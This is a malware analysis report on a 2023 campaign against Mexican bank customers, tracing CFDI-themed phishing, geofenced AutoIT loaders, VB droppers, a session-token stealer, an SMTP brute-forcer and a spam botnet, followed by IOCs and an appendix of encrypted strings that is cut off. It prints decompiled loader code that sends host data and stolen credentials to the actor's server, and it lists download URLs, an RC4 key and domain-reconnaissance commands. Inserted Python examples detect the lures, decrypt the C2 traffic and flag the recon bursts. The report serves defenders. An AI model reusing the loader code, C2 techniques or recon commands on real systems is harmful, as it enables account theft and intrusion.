At the end of May 2023, a massive phishing campaign was widely distributed, targeting both individuals and organizations based in Mexico.
The images below display examples of the phishing emails sent by the threat actors:
Each email contained a zip archive whose name matches the regex pattern: FACTURA_PDF_XML_\d{6}\.zip
The actor used topics related to CFDI (an electronic invoice format mandated in Mexico) to localize the attack and deceive victims into opening the attachment, which runs the malicious file.
The attack components span multiple stages. The image below shows the steps involved in the attack:
The execution flow is complex and intricate. In the next section, we will break it down.
The phishing email’s attachment is a .zip archive containing a .url shortcut file. When the user opens the shortcut, it accesses and executes the following path:
URL=file:\\45.81.39[.][email protected]\Downloads\FACTURA_ONLINE.jse
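The two lure traits described above (the attachment naming pattern and a .url shortcut whose target is a script on a remote file: path) are easy to check mechanically. The following is an added example written for this write-up, not the campaign's or the original authors' code; the sample .url file is constructed with a documentation IP address, and the `@80` port suffix is an assumption about the partially redacted original path.

```python
import re
from dataclasses import dataclass

# Attachment naming pattern reported for this campaign.
ATTACHMENT_RE = re.compile(r"^FACTURA_PDF_XML_\d{6}\.zip$", re.IGNORECASE)
# Targets that Windows will execute (not merely open) when the shortcut is launched.
SCRIPT_EXTS = (".jse", ".js", ".vbs", ".vbe", ".wsf", ".hta", ".bat", ".cmd", ".exe", ".scr")

# Constructed sample .url file mirroring the campaign's shape. The host is a
# documentation address (RFC 5737), not the real one, and the "@80" WebDAV-style
# port suffix is an assumption about the redacted part of the original path.
SAMPLE_URL_FILE = r"""[InternetShortcut]
URL=file:\\203.0.113.10@80\Downloads\FACTURA_ONLINE.jse
"""


@dataclass
class Finding:
    reason: str
    detail: str


def parse_url_file(text: str) -> dict:
    """Parse an InternetShortcut (.url) file into a dict of lower-cased keys."""
    fields, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def check_url_shortcut(text: str) -> list:
    """Flag a .url whose target is a remote file: path and/or a script payload."""
    findings = []
    target = parse_url_file(text).get("url", "").lower()
    # file:\\host\share... or file://host/share... means the target lives on another host
    m = re.match(r"file:(?:\\\\|//)([^\\/]+)[\\/]", target)
    if m:
        host = m.group(1)
        findings.append(Finding("remote-file-target", host))
        # A raw IP, or user@host / host@port syntax, is unusual for a legitimate shortcut
        if "@" in host or re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?", host):
            findings.append(Finding("ip-or-userinfo-host", host))
    if target.endswith(SCRIPT_EXTS):
        findings.append(Finding("script-extension", target.rsplit(".", 1)[-1]))
    return findings


def check_attachment(zip_name: str, url_file_text: str = "") -> list:
    """Combine the filename check with the .url content check."""
    findings = []
    if ATTACHMENT_RE.match(zip_name):
        findings.append(Finding("lure-filename", zip_name))
    if url_file_text:
        findings.extend(check_url_shortcut(url_file_text))
    return findings


if __name__ == "__main__":
    for f in check_attachment("FACTURA_PDF_XML_123456.zip", SAMPLE_URL_FILE):
        print(f"{f.reason}: {f.detail}")
```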
FACTURA_ONLINE.jse presents a message box with the text:
“Este mensaje ha sido emitido por error. por favor haga caso omiso.” (English: “This message has been issued in error. Please ignore.”)
The script then sends a GET request to the following URL:
https://jogjaempatroda[.]com/redirect/inc3/ex.php?x=1
The script then tries to run the content returned from the request. If the request comes from an IP address located in Mexico, the response is malicious code, which the script runs. This is a form of geofencing: if the request comes from anywhere outside Mexico, a legitimate website is returned instead and the script terminates.
Below you can see the difference in responses to a request that originates within Mexico and to a request that comes from outside of the country:
The malicious response contains two base64 certificates which will both be decoded and saved on the victim’s computer under the following path:
%APPDATA%/lamentacao/habitarao.exe
%APPDATA%/lamentacao/escreverao.a3x
Habitarao.exe is the legitimate AutoIT3.exe interpreter, which runs compiled AutoIT scripts (.a3x); here it is used to execute escreverao.a3x.
Escreverao.a3x is a compiled AutoIT script that can be decompiled using online tools such as myAut2Exe. We analyzed the script and found that it shares a similar structure with previously disclosed campaigns associated with the URSA Trojan Banker:
Global $SURLINFO = "https://jogjaempatroda.com/redirect/inc3/do/it.php"
If _ISWIN7() Then $SURLINFO = "http://jogjaempatroda.com/redirect/inc3/do/it.php"
FileDelete(@ScriptFullPath)
Local $ISADMIN = "User"
If IsAdmin() Then $ISADMIN = "Admin"
Local $SSERIAL = Hex(DriveGetSerial(@HomeDrive & "\")) & "1"
_ILNKER($SURLINFO & "?b1&v1=" & Dec(@OSLang) & "&v2=" & Dec(@KBLayout) & "&v3=&v4=" & _GETOS() & "&v5=" & $ISADMIN & "&v6=" & @OSArch & "&v7=" & AV() & "&v9=" & $SSERIAL, $SURLINFO)
_OUTRECOVERY()
_CHROMERECOVERY()
_OLISTS($SURLINFO & "?b3&v1=" & Dec(@OSLang) & "&v2=" & Dec(@KBLayout) & "&v3=&v4=" & _GETOS() & "&v5=" & $ISADMIN & "&v6=" & @OSArch & "&v7=" & AV())
The script executes three main operations:
The script creates a GET request to the URL:
https://jogjaempatroda[.]com/redirect/inc3/do/it.php
The GET request contains information added by the script:
When investigating the script, we first let it run, but we did not receive the payload. This was because we had sent the request from a computer with an English operating system.
The values of v1 and v2 in our case were: 1033 (English – United States)
Because we knew that the campaign was intended for a Mexican audience, we changed the values of v1 and v2 to 2058 (Spanish – Mexico). We received the payload in response to our updated request. The script will later run the following payload:
https://jogjaempatroda[.]com/redirect/inc3/do/it.php?b1&v1=2058&v2=2058&v3=&v4=Windows 7&v5=User&v6=X64&v7=Microsoft Defender
The downloaded payload is saved in the same folder where the executables are located under the name h2kvs7ajf4.
The script then creates two different persistence methods:
The script then executes the downloaded payload.
In parallel to the execution of the next stage payload, the script also steals local Outlook and Chrome credentials, and it then creates a POST request to the following URLs:
https://jogjaempatroda[.]com/redirect/inc3/do/it.php?info=
https://jogjaempatroda[.]com/redirect/inc3/do/it.php?info2=
The previous script downloads a payload which is yet another compiled AutoIT script (.a3x).
After decompiling the file, we can see that the script has several operations:
Here is an example of a GET request to the C&C domain:
http://miningrus1[.]click/system/?h=A1B2-C3D4\1
Below you can see the response we got upon establishing connection with one of the C&C domains:
The script checks for three possible arguments that may be in the response:
The response we got contained a .DOW argument, meaning that the script downloads and executes an executable file hosted at the following URL:
https://jogjaempatroda[.]com/redirect/inc4/ornot.exe
The executable (ornot.exe) run by the script is a Visual Basic 6.0 compiled executable:
This executable is a dropper, carrying an embedded executable in its resource section:
The dropper writes the embedded executable to the following path and immediately executes it:
%APPDATA%/Microsoft/eps2.exe
The dropped executable is also a Visual Basic 6.0 compiled executable:
The first thing we noticed while analyzing the executable is that the threat actor left the project path in its strings:
@*\AC:\Users\Alex Mason\Desktop\Loader Manipulado\Proyecto1.vbp
The path contains the string “Loader Manipulado” (meaning Manipulated Loader in Portuguese, which inspired the name we gave the actor).
Diving deeper into the code, we found that the executable has several anti-VM techniques, including extracting the computer’s BIOS version and system model and comparing them against versions and models known to belong to virtual machine environments:
The executable also compares the OS language against the following values:
If the language of the infected computer is one of the above, the executable proceeds to the next anti-VM check, which compares the computer name to “JOHN-PC”.
If the checks pass, the executable moves to another function that contains a number of obfuscated strings:
After deobfuscating the strings we understood the purpose of the function:
The first part of the function looks at the title of the current active window. If it contains one of the bank names (BBVA, Banorte, Citibanamex, Santander, Scotiabank), the executable downloads two executable files and saves them under the Public folder.
The executable files are downloaded from the following URLs:
https://www.css-styles[.]com/media/descarga/auit
https://www.css-styles[.]com/media/descarga/btudt
Auit is the same executable as Habitarao.exe (the only difference is the version: Habitarao.exe is AutoIT3.exe version 3.3.16.1 and Auit is version 3.3.14.5), so it serves the same purpose of executing a compiled AutoIT3 script (btudt).
The decompiled code of btudt contains two primary components:
The function J is responsible for decrypting the encrypted strings. We wrote a Python script (Appendix 1) that replicates the decryption process and prints the decrypted strings:
Based on the output, we found that the strings describe an injection procedure (APIs such as WriteProcessMemory and CreateProcessW).
By dumping the hex-encoded embedded executable and converting it to binary, we observed that it is yet another Visual Basic 6.0 compiled executable:
The executable contains an embedded blob of data encrypted with RC4. The key is: holahola. (For the decryption script, see Appendix 2.)
The decrypted blob is a Visual Basic script:
The script sends a POST request to the following URL:
https://www.aplications-update[.]com/a/b/
The request contains several parameters:
Each parameter value is encrypted with RC4 using the same key (holahola).
The response to the request is encrypted using the same algorithm and key; the script decrypts the response and handles the decrypted data. The decrypted data has three fields:
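Because every request field and the response share one static RC4 key, an analyst can decrypt captured traffic offline. The block below is an added example for this write-up (not the malware's code and not the original authors' Appendix 2 script): it implements RC4 in plain Python so no third-party package is needed, and assumes the on-the-wire fields are hex-encoded, as in Appendix 2; the field names in the constructed sample POST body are placeholders, since the page does not list them.

```python
from typing import Dict

C2_KEY = b"holahola"  # RC4 key recovered from the sample, as stated in the analysis


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 stream cipher. The same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    # Key-scheduling algorithm (KSA): permute S under the key
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA): XOR the keystream over the data
    out = bytearray(len(data))
    i = j = 0
    for n, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = byte ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def decrypt_hex_field(hex_value: str, key: bytes = C2_KEY) -> str:
    """Decrypt one hex-encoded RC4 field and decode it as text.

    Hex encoding of the on-the-wire value is an assumption taken from Appendix 2;
    swap bytes.fromhex for base64.b64decode if a capture shows base64 instead.
    """
    return rc4(key, bytes.fromhex(hex_value)).decode("utf-8", errors="replace")


def encrypt_hex_field(text: str, key: bytes = C2_KEY) -> str:
    """Inverse of decrypt_hex_field; used here only to build sample traffic."""
    return rc4(key, text.encode("utf-8")).hex()


def decrypt_request(params: Dict[str, str], key: bytes = C2_KEY) -> Dict[str, str]:
    """Decrypt every field of a captured POST body (name -> hex ciphertext)."""
    return {name: decrypt_hex_field(value, key) for name, value in params.items()}


# Constructed sample POST body: field names are placeholders (the real ones are
# not listed on the page); values are what the script would send after RC4.
SAMPLE_POST = {
    name: encrypt_hex_field(value)
    for name, value in {"os": "Windows 7", "bank": "BBVA"}.items()
}

if __name__ == "__main__":
    # Standard RC4 test vector: key "Key", plaintext "Plaintext" -> bbf316e8d940af0ad3
    print(rc4(b"Key", b"Plaintext").hex())
    print(decrypt_request(SAMPLE_POST))
```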
There are five operations that can be executed by the script:
In our case, the script downloads and executes an AutoIT file, retrieved from the following URL:
https://stats.javas[.]live/media/tareas/injmx
The retrieved file is a compiled AutoIT script executable.
The AutoIT banker malware first checks whether the current active window belongs to one of the browsers below:
The banker malware monitors the user’s browser activity by checking the URLs the user accesses and comparing them to the URL “bbvanet.com[.]mx/mexiconet”.
If the user accesses that URL, a forged request is injected into the browser to steal a local storage value that probably holds the user’s session token.
We created a fake value for the key ixd1 in the local storage of the targeted website and browsed to the website. At the same time, we monitored the network traffic and saw that a forged request was made to the C2 server that included the value of the ixd1 key along with the full URL path encoded in base64:
This ends the current campaign. The threat actor gains access to the user’s bank account and can extract all the information desired: account balance, recent actions taken, screenshots and more.
In this section we will disclose a number of poor OpSec (operations security) decisions made by the threat actor that let us unravel the real volume of the infection, the possible revenue from infections, and some of the tools the threat actor used.
Working together with @Merlax_, we found that the C2 server hosted a Django REST framework, meaning that there was an open API URL that we could browse to see the various data tables.
The names of the tables are written in Spanish. Here is the translated version of the names:
The interesting tables are “Records” and “Simple_records” (a mini version of the “Records” table). Those two tables contain the data of the infected users, including their balance, date of infection, latest transactions, and, in some cases, a screenshot of their bank account.
We also can see the total number of infections:
In this C2 server we found over 140 victim logs from the past two months alone.
We didn’t stop there; together with @Merlax_ we found three more C2 servers with the same pattern and the same open REST API access as the first one.
By summarizing all the data we could harvest from those C2 servers, we managed to find over 4K victims in total, with possible revenue of $55 million (please note: this calculation is based on the balance amount at the time of infection). The earliest sign of infection we could trace back was about a year ago.
We found a panel login page, seen on all four C2 servers, that hasn’t been disclosed anywhere previously:
Working together with @1ZRR4H, we identified a web panel hosted on several domains presented in the execution flow (miningrus1[.]click and moscow12[.]at):
The panel is used for distributing emails. The actor can modify the sender name, subject, content of the mail, and through which SMTPs the mails will be sent. The actual spamming is done by a botnet. (The spamming payload is explained later).
Both domains resolve to the IP: 194.180.48[.]54
While investigating miningrus1[.]click we found a urlscan.io scan that fetched a payload from the domain. Naturally, we started to investigate the payload.
Ascan is written in .NET and its purpose is brute forcing SMTP servers with weak credentials.
Ascan generates a random IP address and checks whether it has an open SMTP port (587). On a hit, the program first tries to send a test mail without authenticating (it uses the username nouth and a blank password); if that fails, it iterates through a dictionary of usernames and passwords in the hope of hitting a weak credential setup.
The test mail is sent to “[email protected]” with the display name “Rose Amag3”.
In other samples of the Ascan we found two other recipient mailboxes:
We searched for these mailboxes on this relay-attempts page, created by researcher Alexey Shpakovsky, and found many SMTP relay attack attempts. The interesting part was that most of the IPs conducting the attacks were private IP addresses located primarily in Mexico. This led us to conclude that upon a successful infection, Ascan (and all the following tools) are downloaded to and stored on the victim’s computer as part of the persistence.
We observed additional campaigns conducted by the same threat actor which installed malicious browser extensions on the victim’s Google Chrome or Microsoft Edge browser.
The distributed executables contained base64 encoded strings, which, when decoded, reveal the content of the malicious extension:
The extension name was set to “Chrome Notification” to discourage users from deleting it if they notice it.
The extension monitors the site the user is currently visiting. If the site is one of those targeted by the extension, it redirects the user to a phishing site impersonating the targeted bank.
Below is a list of the targeted banking sites and phishing sites observed during our analysis:
In certain cases (probably on high-value targets), the actor drops the NetInfo executable, a simple reconnaissance tool that gathers information about the domain the user may belong to.
The commands below are executed:
net group "Domain Admins" /domain
net group "domain computers" /domain
nltest /domain_trusts /all_trusts
nltest /domain_trusts
net view /all
After the commands are executed, a concatenated string containing the output of each command is sent via a POST request to one of the actor’s domains.
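NetInfo's fingerprint is not any one of these commands but the burst of several of them from a single host within seconds, which is a useful distinction from routine admin use. The following detection logic is an added example for this write-up, not a rule from the original authors: the process-creation log format is an assumption (adapt `LINE_RE` to your EDR or Sysmon export), and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands run by NetInfo, as listed above; each pattern is matched
# against the full command line, case-insensitively.
DISCOVERY = {
    "domain_admins": re.compile(r'net\s+group\s+"?domain admins"?\s+/domain', re.I),
    "domain_computers": re.compile(r'net\s+group\s+"?domain computers"?\s+/domain', re.I),
    "trusts": re.compile(r"nltest\s+/domain_trusts", re.I),
    "net_view": re.compile(r"net\s+view\s+/all", re.I),
}

# Constructed process-creation log lines (format is an assumption).  WS01 shows
# the NetInfo burst; WS02 shows ordinary admin activity that must not alert.
SAMPLE_LOG = [
    '2023-06-01T10:00:01 host=WS01 user=alice cmd=net group "Domain Admins" /domain',
    '2023-06-01T10:00:02 host=WS01 user=alice cmd=net group "domain computers" /domain',
    '2023-06-01T10:00:03 host=WS01 user=alice cmd=nltest /domain_trusts /all_trusts',
    '2023-06-01T10:00:04 host=WS01 user=alice cmd=nltest /domain_trusts',
    '2023-06-01T10:00:05 host=WS01 user=alice cmd=net view /all',
    '2023-06-01T11:30:00 host=WS02 user=bob cmd=net view /all',
    '2023-06-01T11:31:00 host=WS02 user=bob cmd=ipconfig /all',
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


def parse_line(line: str):
    """Return (timestamp, host, user, cmd) or None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["host"], m["user"], m["cmd"]


def classify(cmd: str):
    """Name the discovery technique a command line belongs to, or None."""
    for name, pattern in DISCOVERY.items():
        if pattern.search(cmd):
            return name
    return None


def detect_netinfo_bursts(lines, window=timedelta(seconds=60), min_distinct=3):
    """Alert once per (host, user) whose distinct discovery commands reach
    min_distinct inside `window`; isolated net/nltest invocations stay silent."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host, user, cmd = parsed
        kind = classify(cmd)
        if kind:
            events[(host, user)].append((ts, kind))
    alerts = []
    for (host, user), evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            kinds = {k for t, k in evs[i:] if t - start <= window}
            if len(kinds) >= min_distinct:
                alerts.append({"host": host, "user": user,
                               "first_seen": start.isoformat(), "techniques": sorted(kinds)})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_netinfo_bursts(SAMPLE_LOG):
        print(alert)
```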
Spmr.exe is the spamming tool used by the actor to conduct the phishing campaign.
It uses the infected machines as spamming stations to send out phishing emails.
The tool starts by fetching the campaign configuration information using a GET request to a hardcoded C&C URL.
The URL may have three possible responses:
The configuration data itself is hosted at another URL; it is an XML document with nine base64-encoded data fields. The tool decodes these values and uses them to set up the spamming campaign.
The fields are:
The tool then conducts the spamming campaign by relaying through the SMTP servers found earlier (by the Ascan tool) and sending the emails to the spam list.
Files –
IPs –
Domains –
SMTP relays recipients –
strings = ['UHAIRISHOJEJBJFIIJEGUJCIKIHJDILFPFKIHJJJDILIAFKFHFOFHGUIOIUIGJCJIHIIKIUFPFMIHGUIOIUIGJCJIFRFHFOFHFKICFKFQ', 'JPKRGQKRBPKJHJIPIPIODQERJQAMBRARDRCJHODPKRDPKRCRFQAPJMCQKRERBJIMKQARCQGRDQKQKMCQKRERBJIOEQERDQHPKMCPJRHQJRCPJJIOIMCPJRHQJRCPJJIOJMCPJRHQJRCPJJIOIOEQDRKPKMCPJRHQJRCPJJIOJOEQDRKPKMCPJRHQJRCPJJIOIMKQJRFQIREMJQDPGRCRCMCPJRHQJRCPJJIOJMKQJRFQIREMJQDPGRCRCMCPJRHQJRCPJJINBQEQGQHMHRERDRCQDPIREREPKMCPJRHQJRCPJJINBQHPGQCRCMCRGQKRBPKJHOEQCQKRGOIQDQJPJQKRGMCRGQKRBPKJHODPKRDPKRCRFQAPJLEMBRARDRCJHODPKRDPKRCRFQAPJLEMBRARDRCJHQDODREPJNFQIRAREREMBRARDRCJHQDODREPJOAREREQKRFRDMCQKRERBJIQCOERDPKNARCRBQKRB', 'OMAMDMCGPKAMBLPLCLFMCMDIKMAMDMCGPKELHMCLELBLDILLDMHLOMCLDHAJPMCLOLDLEMDMCJJLDILLDMHLOMCLDHAKDLIMBLFLALEJILE', 'SHLJRJFJAKAJEIEJRJPJCJFJSJTIK', 'NKJMMMKLMMAMNMO', 'OKELHMCLELBLD', '[GYHOHHHJGYELFTHGHGHLGZHPHMFVHEGUG\HKFLGXHPHGHKGXEMFTHKE\FLELGYHOHHHJGYELFUHJFBFKEMGXHPHGHKGXEMFTHKFBFLELGYHOHHHJGYELFUHJFDFKEMGXHPHGHKGXEMFTHKFFFLELGYHOHHHJGYELFUHJFHFKGYHOHHHJGYELFTHGHGHLHKHGHEGKHHHJGYFKEMGXHPHGHKGXEMGGHMGUHMHMHLGKHHHJGYFKEMGXHPHGHKGXEMGHGVG[GLHGHKGXFLELGYHOHHHJGYELFVHJHKHGHKGCG[GZHLGYHMFKEMGXHPHGHKGXEMFUHKHJHHHJGHGYHEGYGXHLHHHJFLELGYHOHHHJGYELFUGUHMGUGDGZG[HKGZHLFLELGYHOHHHJGYELFUGUHMGUGHGYHEGYGXHLHHHJFLELGWHQHMGYEMGFGZG[HBHKHMGYHKFQHKGYGVGOFIE\GRFKEMGXHPHGHKGXEMFSHKE\GCHHHQGGHMGUHMGYFLGXHPHGHKGXEMGGGZG[FXHKFLELGYHOHHHJGYELGHGYG\FVHLFKEMGXHPHGHKGXEMGGGZG[FVHKFLELGYHOHHHJGYELGHGYG\FTHLFKGYHOHHHJGYELFVGXHBFKEMGXHPHGHKGXEMFUHLHAFLELGYHOHHHJGYELFVGVHQFKEMGXHPHGHKGXEMFUGYHPFLELGYHOHHHJGYELFVGWHQFKEMGXHPHGHKGXEMFUGVHPFLGXHPHGHKGXEMFUGWHHFLELGYHOHHHJGYELFVHAHIFKEMGXHPHGHKGXEMGGGZG[FTHKFLELGYHOHHHJGYELFVFVHEGUG\HKFLELGYHOHHHJGYELFVHKHIFKEMGXHPHGHKGXEMGGGZG[GHHKFLGVHRHLGZELFVHPHMGYHGGXGZGXGGGYG\HAHLHLGZHJHLGOFFFAFCGQ', 
'KOHOLOFPJJAMIOFOKPBOGNLKFOBLCQDPGPKOHJALJQFPLOJPKMLPFMIOEPLPLNAOEOLOILDQCPHPJOIILNAOEOLOIPLLCQDPGPKOHJANBOJPDPHOGOFPLPBPGPGPKLDQCPHPJOIILNDPAQGOIPHOJMEOIOFOHOJPJLDQCPHPJOIILMJPAPGPAPFQAPFMAQEPLPKOELDQCPHPJOIILMJOEQEPAPFQAPFMAQEPLPKOELDQCPHPJOIILNDNCLDQCPHPJOIILNDMLLDQCPHPJOIILLLOLOJOGPDPKQBPELDQCPHPJOIILMFMLLDQCPHPJOIILLLNCLDQCPHPJOIILNCOIPEPGOHOEQAPAPHPFLDQCPHPJOIILMLQBOJPJPEOEQFLCOHOLOFPJJANBOJPKOJPJQCOIOINKLAOALDQCPHPJOIILMLMAMJMEOIOIPGPLPBOJPBOIPKLCQDPGPKOHJAMKMBMIMFPFOKPGPKPEOFPLPBPGPGLCOHOLOFPJJANBOJPKOJPJQCOIOIKFNLKFKEOALDOHQDPGPKOHJALIOIOHPKOIPLPKMLOJMKOIQDMAQEOIMEOIOFOHOJPJ', 'ZHVHMHQHBEPGFG[HAHGHGHMHCFPHUHNHPHCEOGHHSHLG[HDHPGIHDGMHCHBHRHHHMHMHQFPHBHVHMHQHBEPGMHHHKHDFXG[HRHDGLHSGZHLHNFPHBHVHMHQHBEPGIHNHGHMHRHDHPGNHMGMHWHLG[HNHJGNGZHAHJHDFOHCHUHNHPHCEOGHHSHLG[HDHPGIHDGMHWHLG[HNHJHRFOHVHMHQHBEPGLHHHXHDGHHEGHHOHRHHHMHMGZHKGAHDGZHCHCHQFOHVHMHQHBEPFWHGGZHQGZHBHRHDHPHHHQHSHGHBHQ', 'PLNLELIKKGLJEKIKNKQKJIEKILPLJKMGKJFKHLALELIJDKQLDLBKLLIJNKMLHLJKPLFLDIEKILPLJKMGKJFKPLELELIJDKQLDLBKLLIJNKMLHLJKPLFLDIEKKLNLELIKKGLJKKQLPKMJGKNILLFKKKMIDKLLMLFLHKLGKJLKPLQKLJHKMJBLDKQLJKQKHLCKPLQKLKLIMKILJKIIDKLLMLFLHKLGKJLKPLQKLJHKMJNLDKQLDKQLJKQKHLCKPLQKLKLIMKILJKIIDKLLMLFLHKLGKIKKKKLLHKMLILJJGKNINLELJLILOJILEKQLDLKIDKLLMLFLHKLGKILKHLJKLJHKMIMLEKLKLIEKKLNLELIKKGLIKKILIKMJGKNIMKILJKIIDKLLMLFLHKLGKJBLCKIKNKMIKKILIKMIDKLLMLFLHKLGKJLKLKKLJKQLELEIJLCKPKOLDLDKLLELJIEKKLNLELIKKGLIOKQLBKMIJLCKPKOLDLDKLLELJIELMLFLHKLGKJFKHLALELIJGLGKLLIKHLKKPLEKNJLLOLJLJKMLCJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJHLFKMLHKILJKQLDKOJKLPLILKKLLDJNKMLHLJKPLFLDIELMLFLHKLGKJFKHLALELIJALDKHKOKLJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJBLCKIKNKMJNKMLHLJKPLFLDIELMLFLHKLGKJFKHLALELIJKLLKILJLOLJLJKMLCJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJLLKKJLILPLILKKLLDJNKMLHLJKPLFLDIEKKLNLELIKKGLJOKQLDHNHLJOKLLILIKQLELEJNKILBLLKLIEKKLNLELIKKGLJKKQLPKMJGKNJALDKHKOKLIEKKLNLELIKKGLJKKQLPKMJGKNIQKMKHKLKLLILIIEKKLNLELIKKGLILKPKLKKLAJLLKLDIDLNLELIKKGLJKLLKILJLOLJLJKMLCIELMLFLHKLGKINLBLCILKPKHLIKHKKLJKMLHKQLILKKPKKLIIEKKLNLELIKKGLJKKQLPKMJGKNJKLKKH
KKLAJKKLLJKLLILLKMIDKLLMLFLHKLGKJLKPLQKLJHKMJLLJKIKJLBILLFLCLDKPLKIDKLLMLFLHKLGKJLKPLQKLJHKMJAKLKILFJKKLLJKLLILLKMIDKLLMLFLHKLGKJLKPLQKLJHKMJAKLKILFIMLELDLCKQLJIEKKLNLELIKKGLJDLFKHKLKLLIIOLCKHKOLIIEKKLNLELIKKGLJFLLLCKJKLLIJGKNJJLMKHIKLDKLJKKQLPKMLI', 'XGHHVHWGVIFICIGHMIFGJHPIEGHHKIFHKFEEYIFGLGQGDGKGHHJGRGTGWGMGRGRGDGPHIGLGHGEGGGIGUFIEUHUFDEXHBGKGHGLGQGLGRGMGFGLGSGMGGGMGHGKGUGLGTGKGKGLHCGMGHGMGGGMGMGKGWGLHCGLGWGLHBGMGIEXFEFF', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOIHHJHJHKHCHKHUHJIFHJHFHJIGHIIFHJIFHJICHJIEHJIGHKHLHKHNFOFUGA', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOIGHJHEHKHMHJIHHKHGHKHFHIICHJIHHKHSHKHFFOFUGA', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOHPHNHOHPHFHQHIHOHQHNHKHPHCHNHEHPHJHOHNHPHDHPHCFOFUGA', 'JPJQCPHRBJINJPHQHQAPALKPCMCPJRHQJRCPJJIOFQJQDQKQIOAQAOHQDRCRDRFPGQHODQERJQAMHQJPJOBQCRJRCQEPIPHQGMIPJPKRBQARCRDMBPKRGQKRBPKJHOHQDRCRDRFPGQHMHPKPJRCPKRDRCMCPJRHQJRCPJJIODQERJQANKQBOCPHRGNAPGREPGMCPJRHQJRCPJJIOAQKQDQJRDQARBOFQJODPGRHMKPHRDPHMBPKRGQKRBPKJHOBQJQEQIREPKRCOEQKOCQAQGQKPIPHRDQEQJQJRCMCPJRHQJRCPJJIOAQKQDQJRDQARBOFQJNIQDQJPKQJREQIPHQARBRDMBRHQJRCPJJINJRFQHPIPKRCNKQBOCQAQGQKPIPHRDQEQJQJRCMCRGQKRBPKJHNKREQIPHQARBOAQANIQDQJPKQJREQIPHQARBRDMBPKRGQKRBPKJHMKQCPHRBPHPIREPKRCQDRDRDQEPIRD', 
'JPIRIREPKJINEQJQCQARBQERDQAPJMIPJPKRBQARCRDODRAPGPJPKMCPHRJRDQAJHODPKPHPJNFQHPHQBQANBQEQGQANARIPKPJNKRARDQEQJQJRCMCPHRJRDQAJHMJPKQEQIQCMKQAPHRFQBQCPKPKMBPIRIREPKJIODRAPGRCPKMCQKRERBJINIRFRDPHQIREMBRARDRCJHNFQHPHQBQAMIPHRCQAMHPKPJRCPKRDRCMCQKRERBJINHQKPGPKPKRCMKPHRDPHMBRARDRCJHOBRBQKPIQARCRDOAPHRBPHQHQARDQARBRDMBRARDRCJHOEREPIODRJRCREPKQIMKPHRDPHMBRARDRCJHOBRBQKPIQARCRDNDQAPGRAMBRARDRCJHNCPGRDRDOBPKPINHQKPIQGMBRARDRCJHNCPGRDRDOBPKPINHQKPIQGOCQKREREQDQJPKMCQKRERBJINBPHRCREOAQAPHOGQIQHQJPJQFODQJRFRDQEQIQAMBPKRGQKRBPKJHNBQIRGQDRCQJQJQHQAQIREOFRAPJPHRDQAMJQKREQJRDMCQKRERBJINGQARBQJPKQHMJPHQGQHPHPHPIQGOEPHPHQHPKMCQKRERBJINARGPKQJRDNIQJQCODQAPIREQDQKQIMCQKRERBJINARGPKQJRDNIQJQCMBRARDRCJHNCRBQAPKNIQDRDRDMCPJRHQJRCPJJIOEQHRCNBRHRAPGQJRCQEQJQJMJQKREQJRDQARBMCQKRERBJIOEQHRCMJQDREQHPHQKMCPJRHQJRCPJJIOEQHRCMJQDREQHPHQKMJQDRERCPBLDPDMBRARDRCJHODPKPHPJOAQIQHRIOEQCPHRBQAPJNJPKQIQJRCRIMJPGRDPKMCQKRERBJIOCQAPGPKNKQJQGRJODQDPGRCPKPKNIQAQHQKRBRJNDQAPGRAMBRARDRCJHODPKPHPJOAQIQHRIOERDPHRDQEPIOEPKRCRFQARBNAPGREPGMCQKRERBJIMHQJRCQEMJQKPJQAOAPHQBQAMKPHRDPHMBRARDRCJHOAPKQIMJQKPJQAOAPHQBQAMKPHRDPHMBRARDRCJHOGQIQEPIQKPJQAMJPHRCQAOEPHPHQHPKNAPGREPGMCPJRHQJRCPJJINJRFQHPIPKRCNKQBOARCQJPJPKRDRCQKRBRDMBPKRGQKRBPKJHNKRDNDQGQKPHPHQGNCQGPHQBMCPHRJRDQAJHOEQKPHRBQALDPBLFPDMBQEQIRELHLGJHMKRBQERDQEPIPHQGOEPKPJRDQEQJQJOEQEQHQAQJRFRDMCPJRHQJRCPJJINDQAPGRAODQAQBQIPKQJRDODPKRDPKRCRFQAMBPKRGQKRBPKJHNEPKPHQKOEPKQCQHQAQIREMJQKQHQIQDREMBPKRGQKRBPKJHNEPKPHQKNAPKMKQJQIQHQERDOFQJREPGQHNBRCPKQAOEQDRBQARCQDQJQHPJMCPJRHQJRCPJJINDQAPGRAMKQAMJQKQHQIQDRENBRCPKQAMIQHQJPJQFO